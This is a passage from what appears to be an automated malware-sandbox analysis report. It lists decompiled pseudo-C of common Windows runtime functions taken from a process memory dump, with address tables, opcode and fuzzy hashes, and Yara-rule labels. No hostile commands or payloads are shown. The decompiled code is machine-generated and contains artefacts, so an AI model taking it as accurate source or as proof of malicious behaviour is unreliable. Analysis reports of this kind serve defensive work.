Instruction Fuzzy Hash: D131DE32A04658DBDB358F2EC84AA6BBBF5FF85710B15807AE845CB350E734D940E790

Uniqueness

Uniqueness Score: -1.00%

Function 00FDA61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FDA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1080220);
				E00FFD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1097b9c; // 0x0
				_t55 = L00FC4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E00FFD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1097b10 =  *0x1097b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x109536c; // 0x77f05368
					if( *_t51 != 0x1095368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1095368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x109536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E00FDA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x00fda61c
0x00fda61e
0x00fda623
0x00fda628
0x00fda62b
0x00fda62d
0x00fda648
0x00fda64a
0x00fda64f
0x01019b44
0x00fda6ec
0x00fda6f1
0x00fda6f1
0x00fda655
0x00fda657
0x00fda65a
0x00fda65d
0x00fda662
0x00fda663
0x00fda667
0x00fda668
0x00fda66d
0x00fda706
0x00fda706
0x01019bda
0x01019be6
0x01019beb
0x00000000
0x01019beb
0x00fda679
0x01019b7a
0x00000000
0x01019b7a
0x00fda683
0x00fda6f4
0x00fda6f7
0x00fda6f9
0x00fda6fd
0x00fda6a0
0x00fda6a0
0x00fda6ad
0x00fda6af
0x00fda6b4
0x01019ba7
0x01019bac
0x00000000
0x00000000
0x01019bc6
0x01019bce
0x01019bd1
0x01019bd3
0x01019bd3
0x00000000
0x01019bd1
0x00fda6bd
0x00fda6c3
0x00fda6c6
0x00fda6d2
0x00fda701
0x00fda704
0x00000000
0x00fda704
0x00fda6d4
0x00fda6d6
0x00fda6d9
0x00fda6db
0x00fda6e1
0x00fda6e6
0x00fda6e8
0x00fda6e8
0x00fda6ea
0x00000000
0x00fda6ea
0x00fda688
0x00fda692
0x00fda694
0x00fda699
0x00000000
0x00000000
0x00fda69d
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0f7328a5b7b6faad8b04e1a992abc2bdc1989c30948029cf022ca0d43d5e9d1
Instruction ID: e72d1ee9b21f7756a0da75a80eece04b5f54276d1555d2cde21876372cf3308c
Opcode Fuzzy Hash: a0f7328a5b7b6faad8b04e1a992abc2bdc1989c30948029cf022ca0d43d5e9d1
Instruction Fuzzy Hash: 82417C75A00205DFCB15CF58C9A0B99BBF2BF49314F18C0AAE944AB349C779A901EF54

Uniqueness

Uniqueness Score: -1.00%

Function 01027016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01027016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x109d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01026B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01026B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E00FC7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E00FE9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E00FEB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L00FC4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x01027016
0x0102701e
0x0102702b
0x01027033
0x01027037
0x0102703c
0x0102703e
0x01027041
0x01027045
0x0102704a
0x01027050
0x01027055
0x0102705a
0x01027062
0x01027062
0x0102705a
0x01027064
0x01027064
0x01027067
0x01027071
0x01027096
0x0102709b
0x010270a2
0x010270a6
0x010270a7
0x010270ad
0x010270b3
0x010270b6
0x010270bb
0x010270c3
0x010270c3
0x010270c6
0x010270cd
0x010270dd
0x010270e0
0x010270e2
0x010270e2
0x010270ee
0x01027101
0x010270f0
0x010270f9
0x010270f9
0x0102710a
0x0102710e
0x01027112
0x01027117
0x01027118
0x01027118
0x010270bb
0x0102711d
0x01027123
0x01027131
0x01027131
0x01027136
0x0102713d
0x0102713e
0x0102713f
0x0102714a
0x0102714a
0x01027084
0x01027088
0x00000000
0x0102708e
0x0102708e
0x01027092
0x00000000
0x01027092

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d85e0967874f894e91cece462a7c5fa3a0c51ef264f7c67bb44d646b6982a7d4
Instruction ID: 2071a9250dcc456e9e9ec1c8602a8b8db0f71ecc961940c74938283aaba2542a
Opcode Fuzzy Hash: d85e0967874f894e91cece462a7c5fa3a0c51ef264f7c67bb44d646b6982a7d4
Instruction Fuzzy Hash: 5631E4726047A19BC320DF2CCD81A6AB7E9BF98700F044A6DF99587691E734E904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00FCC182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00FCC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E00FC7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01078D34(_v8, _t80);
					}
					E00FC2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E00FBFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01078833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E00FBFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E00FEB180();
						if(_a4 != 0) {
							E00FC2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E00FCBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E00FCBB2D(_t16, _t15);
						E00FCB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E00FBFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E00FBFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E00FBFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x00fcc18d
0x00fcc18f
0x00fcc191
0x00fcc19b
0x00fcc1a0
0x00fcc1d4
0x00fcc1de
0x01012d6e
0x00fcc1e4
0x00fcc1e4
0x00fcc1e4
0x00fcc1ec
0x01012d7d
0x01012d7d
0x00fcc1f3
0x00fcc1ff
0x01012d88
0x01012d8d
0x01012d94
0x01012d94
0x01012d9f
0x01012da4
0x01012dab
0x01012db0
0x01012db2
0x01012db3
0x01012db4
0x01012dbc
0x01012dc3
0x01012dc3
0x00fcc205
0x00fcc205
0x00fcc208
0x00fcc20e
0x00fcc211
0x00fcc216
0x00fcc219
0x00fcc21f
0x00fcc222
0x00fcc22c
0x00fcc234
0x00fcc23a
0x00fcc23f
0x00fcc245
0x00fcc24b
0x00fcc251
0x00fcc25a
0x00fcc276
0x00fcc27d
0x00fcc27d
0x00fcc25c
0x00fcc25c
0x00000000
0x00fcc25e
0x00fcc1a4
0x00fcc1aa
0x00fcc1b3
0x00fcc265
0x00fcc26c
0x00fcc26c
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 5a8b468e677e320ffa855fcb6864b566e30dcd93df57cb6cb1e99d6ccdf1435c
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: A7311472A01547AAD704EBB5CD82FE9F754BF42304F18416EE41C47202DB386A09EBE1

Uniqueness

Uniqueness Score: -1.00%

Function 01053D40, Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E01053D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x109d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E00FC2280(_t34, 0x1098a6c);
				_t64 =  *0x1095768; // 0x77f05768
				if(_t64 != 0x1095768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77f05770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E00FBFFB0(_t53, _t64, 0x1098a6c);
						 *0x109b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E00FC2280(_t45, 0x1098a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x1095768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E00FBFFB0(_t51, _t64, 0x1098a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E00FEB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x01053d40
0x01053d48
0x01053d52
0x01053d59
0x01053d5d
0x01053d61
0x01053d63
0x01053d67
0x01053d69
0x01053d72
0x01053d76
0x01053d7a
0x01053d7f
0x01053d8b
0x01053d91
0x01053d91
0x01053d91
0x01053d94
0x01053d96
0x01053d9d
0x01053da1
0x01053db0
0x01053dba
0x01053dbc
0x01053dbc
0x01053dc6
0x01053dcb
0x01053dcf
0x01053dd1
0x01053dd4
0x00000000
0x00000000
0x01053dd9
0x01053e0c
0x01053e0c
0x01053e0f
0x01053ddb
0x01053ddb
0x01053de0
0x00000000
0x01053de2
0x01053de2
0x01053de4
0x01053de8
0x01053deb
0x01053df1
0x00000000
0x01053df3
0x01053df3
0x01053df5
0x01053df8
0x01053dfa
0x00000000
0x01053dfa
0x01053df1
0x01053de0
0x01053e11
0x01053e11
0x00000000
0x01053dfe
0x01053e04
0x01053e06
0x00000000
0x01053e06
0x00000000
0x01053e04
0x01053d91
0x01053e15
0x01053e1a
0x01053e1f
0x01053e1f
0x01053e23
0x01053e29
0x00000000
0x00000000
0x01053e2e
0x00000000
0x01053e30
0x01053e30
0x01053e35
0x00000000
0x01053e37
0x01053e3e
0x01053e42
0x01053e48
0x01053e4e
0x00000000
0x01053e4e
0x01053e35
0x00000000
0x01053e2e
0x01053e5b
0x01053e5c
0x01053e5d
0x01053e68
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81285c7e480ae8a8a1c191730f580d1182676939d88a4ed96e82226f5f9d7e67
Instruction ID: b35202101f8c3f9399bb66759f03944b394b1038ad2bd8ebe62d94abfe2a2aa7
Opcode Fuzzy Hash: 81285c7e480ae8a8a1c191730f580d1182676939d88a4ed96e82226f5f9d7e67
Instruction Fuzzy Hash: 94319871509302CFCB54DF18D98595ABBE1FF85744F0489AEF8889F282D734D904DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FDA70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00FDA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1097b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1097b10 = 8;
					 *0x1097b14 = 0x1097b0c;
					 *0x1097b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E00FDA990(0x1097b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L00FDA840(__edx, __ecx, __ecx, _t52, 0x1097b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1097b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1097b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1097b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L00FC4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1097b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E00FEF3E0(_t50,  *0x1097b14, _t8 >> 3);
						_t28 =  *0x1097b14; // 0x0
						__eflags = _t28 - 0x1097b0c;
						if(_t28 != 0x1097b0c) {
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1097b14 = _t50;
						_t48 = _v12;
						 *0x1097b10 = _t9;
						goto L6;
					}
					 *0x1097b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x00fda713
0x00fda714
0x00fda717
0x00fda71d
0x00fda720
0x00fda722
0x00fda727
0x00fda74a
0x00fda754
0x00fda75e
0x00fda768
0x00fda76a
0x00fda773
0x00fda78b
0x00fda790
0x00fda792
0x00fda741
0x00fda741
0x00fda743
0x00fda749
0x00fda749
0x00fda732
0x00fda73a
0x00fda797
0x00fda79d
0x00fda7a3
0x00fda7a9
0x00fda7b6
0x00fda7bc
0x00fda7ca
0x00fda7e0
0x00fda7e2
0x00fda7e4
0x01019bf2
0x00000000
0x01019bf2
0x00fda7ed
0x00fda7f2
0x00fda800
0x00fda805
0x00fda80d
0x00fda812
0x01019c08
0x01019c08
0x00fda818
0x00fda81b
0x00fda821
0x00fda824
0x00000000
0x00fda824
0x00fda7ae
0x00000000
0x00fda7ae
0x00fda73c
0x00fda73e
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1db5bd3fbf73c4635c5ed0e14ebd79878cb2c40b4f94c195fa81bab4f2bd0a7
Instruction ID: f8a8ed6ff52ed04db1f2409d84edbb1a58db814b55d537b9f974a999d354b388
Opcode Fuzzy Hash: c1db5bd3fbf73c4635c5ed0e14ebd79878cb2c40b4f94c195fa81bab4f2bd0a7
Instruction Fuzzy Hash: A931CFB36282059FC721CB08DCB1F6577FAFB85710F58095AE28587344D3BAA901EF92

Uniqueness

Uniqueness Score: -1.00%

Function 00FD61A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00FD61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E00FD5E50(0xf867cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01079D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E00FAF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x00fd61b3
0x00fd61b5
0x00fd61bd
0x00fd61c3
0x00fd61c7
0x00fd61d2
0x00fd61ff
0x00fd61ff
0x00fd6201
0x00fd6207
0x00fd6207
0x00fd61d4
0x00fd61d9
0x00000000
0x00000000
0x00fd61df
0x00fd61e2
0x00000000
0x00000000
0x00fd61e6
0x00fd61e8
0x00fd61ee
0x00fd61ee
0x00fd61f9
0x0101762f
0x01017632
0x01017635
0x01017639
0x01017640
0x0101766e
0x01017675
0x00000000
0x00000000
0x01017681
0x01017689
0x0101768d
0x01017691
0x01017695
0x01017699
0x010176af
0x010176b5
0x010176b7
0x010176b7
0x010176d7
0x010176dc
0x00000000
0x010176dc
0x010176a2
0x010176a9
0x01017651
0x01017653
0x01017653
0x01017656
0x01017656
0x00000000
0x01017656
0x01017644
0x01017646
0x01017648
0x01017648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 687d8cc7f13ed45afe7c1e21b46b7d9fccba1876b7adf3958e527a87dc207b01
Instruction ID: 706bdcc5804e64a81c908b95fd4846ff2d05d525f0a94b7e66c0ad565965d862
Opcode Fuzzy Hash: 687d8cc7f13ed45afe7c1e21b46b7d9fccba1876b7adf3958e527a87dc207b01
Instruction Fuzzy Hash: 07316972A097018FD360DF19C800B2AB7E5FB88B10F09496EE998DB355E7B4E944DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FAAA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00FAAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x109d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1097b9c; // 0x0
					_t53 = L00FC4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E00FEB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E00FEF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L00FB6C59(_t53, _t51, _t58) != 0) {
							_t28 = E00FD5E50(0xf8c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E00FDB230(_v32, _v28, 0xf8c2d8, 1,  &_v24);
								_t28 = E00FAF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x00faaa25
0x00faaa29
0x00faaa2d
0x00faaa30
0x00faaa37
0x00faaa3c
0x01004458
0x01004458
0x01004472
0x01004474
0x01004476
0x00faaa64
0x00faaa74
0x0100447c
0x01004483
0x01004492
0x00faaa52
0x00faaa54
0x00faaa5e
0x010044a8
0x010044ad
0x010044af
0x010044b6
0x010044b6
0x010044b9
0x010044bc
0x010044cd
0x010044d3
0x010044d6
0x010044e1
0x010044e1
0x010044e6
0x010044e8
0x010044fb
0x010044fb
0x010044e8
0x00000000
0x00faaa5e
0x01004476
0x00faaa42
0x00faaa46
0x00faaa48
0x00faaa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
